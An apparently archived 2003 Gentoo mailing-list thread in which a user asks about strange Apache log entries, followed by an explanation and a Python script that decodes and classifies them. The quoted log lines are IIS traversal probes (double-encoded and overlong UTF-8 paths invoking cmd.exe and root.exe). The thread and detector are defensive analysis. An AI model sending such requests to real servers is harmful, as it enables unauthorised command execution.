This is no worm, but some kiddy is using a simple security tool to check if he finds old IIS servers that aren't patched against those redirect and unicode vulnerabilities. Lots of kids out there that use these tools :-)
If it is a worm, then you usually have only one or two strange lines in there, but here you have the typical check for several vulnerabilities.

----- Original Message -----
From: "Aaron Walker" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, December 31, 2003 11:18 AM
Subject: [gentoo-user] trying to be hacked?

> A week or so ago, I set up my cable router/firewall to forward port 80 to
> one of my machines so I could run Apache. Last night while at work, I
> checked to see if it worked, and it did. So just now, I went to check
> out the access_log and noticed some funny looking stuff that doesn't
> look like normal activity....
>
> <snipped from /var/log/apache2/access_log>
>
> 218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
>
> Is this someone trying to exploit Apache?
>
> Thanks,
> Aaron
> --
> /usr/bin/fortune says:
> A woman did what a woman had to, the best way she knew how.
> To do more was impossible, to do less, unthinkable.
> -- Dirisha, "The Man Who Never Missed"
>
>
> --
> [EMAIL PROTECTED] mailing list

--
[EMAIL PROTECTED] mailing list
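The requests quoted above are all variants of one trick: smuggle `..\` or `../` past the IIS path check by encoding the separator so that it is only decoded after the check. `%255c` is `%5c` (`\`) encoded a second time, `%%35%63` and `%25%35%63` are the same double-encoding written differently, and `%c0%af` / `%c1%1c` / `%c1%9c` are overlong two-byte UTF-8 forms of `/` and `\` that the old IIS decoder accepted. The script below is an added example, not part of the thread or of any tool the reply mentions: it decodes each path the lenient way the vulnerable IIS canonicaliser did, tags the technique used, and groups the probes per source address so the burst from 65.27.204.81 stands out. The sample log embedded in the block is copied from the post plus one constructed benign request (192.0.2.10) that must not be flagged; the function and tag names are the example's own.

```python
import re
import sys
from urllib.parse import unquote_to_bytes

# Apache combined log: ip ident user [timestamp] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: lines from the post, plus a benign request that must stay unflagged.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Dec/2003:19:00:00 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
"""


def _fold_overlong(data: bytes) -> bytes:
    """Collapse 2-byte sequences with a 0xC0/0xC1 lead byte the way the old IIS
    decoder did. These are overlong encodings of ASCII and are rejected by any
    strict UTF-8 decoder; %c0%af -> '/', %c1%1c and %c1%9c -> '\\'. The second
    byte is not checked for being a valid continuation byte, on purpose."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def iis_decode(path: str) -> str:
    """Lenient canonicalisation: percent-decode twice (so %255c becomes '\\'),
    then fold overlong UTF-8. Backslashes are kept so the caller can see them."""
    once = unquote_to_bytes(path)      # '%%35%63' -> '%5c', '%255c' -> '%5c'
    twice = unquote_to_bytes(once)     # '%5c' -> '\\', '%2f' -> '/'
    return _fold_overlong(twice).decode("latin-1")


def classify(raw_path: str) -> set:
    """Tag the evasion techniques present in one request path (query string dropped)."""
    path = raw_path.split("?", 1)[0]
    tags = set()
    if re.search(r"%c[01]%[0-9a-f]{2}", path.lower()):
        tags.add("overlong-utf8")
    # If a valid %XX triplet survives the first decode, the input was encoded twice.
    if re.search(rb"%[0-9a-fA-F]{2}", unquote_to_bytes(path)):
        tags.add("double-encoded")
    segments = iis_decode(path).replace("\\", "/").split("/")
    if ".." in segments:
        tags.add("traversal")
    if segments and segments[-1].lower() in ("cmd.exe", "root.exe"):
        tags.add("shell-exec")
    return tags


def scan(log_text: str) -> dict:
    """Per source IP: number of flagged requests, first/last timestamp, techniques seen."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        req = m.group("req").split()          # method, path, optional HTTP version
        if len(req) < 2:
            continue
        tags = classify(req[1])
        if not tags:
            continue
        entry = report.setdefault(m.group("ip"), {
            "probes": 0, "first": m.group("ts"), "last": m.group("ts"), "techniques": set(),
        })
        entry["probes"] += 1
        entry["last"] = m.group("ts")
        entry["techniques"] |= tags
    return report


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, e in scan(text).items():
        print(f"{ip}: {e['probes']} probes, {e['first']} .. {e['last']}, "
              f"{', '.join(sorted(e['techniques']))}")
```

Two caveats when reading the output. The decoder is deliberately as permissive as the broken IIS one, so it tells you what the client was trying, not what the server did: Apache answered the `%%35%63` request with 400 and the lowercase `get` with 501, and the rest with 404, because none of those paths exist on a Linux box. And only the two-byte C0/C1 overlong forms that appear in this log are folded; three-byte overlongs such as `%e0%80%af` would need the same treatment extended to E0 lead bytes.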
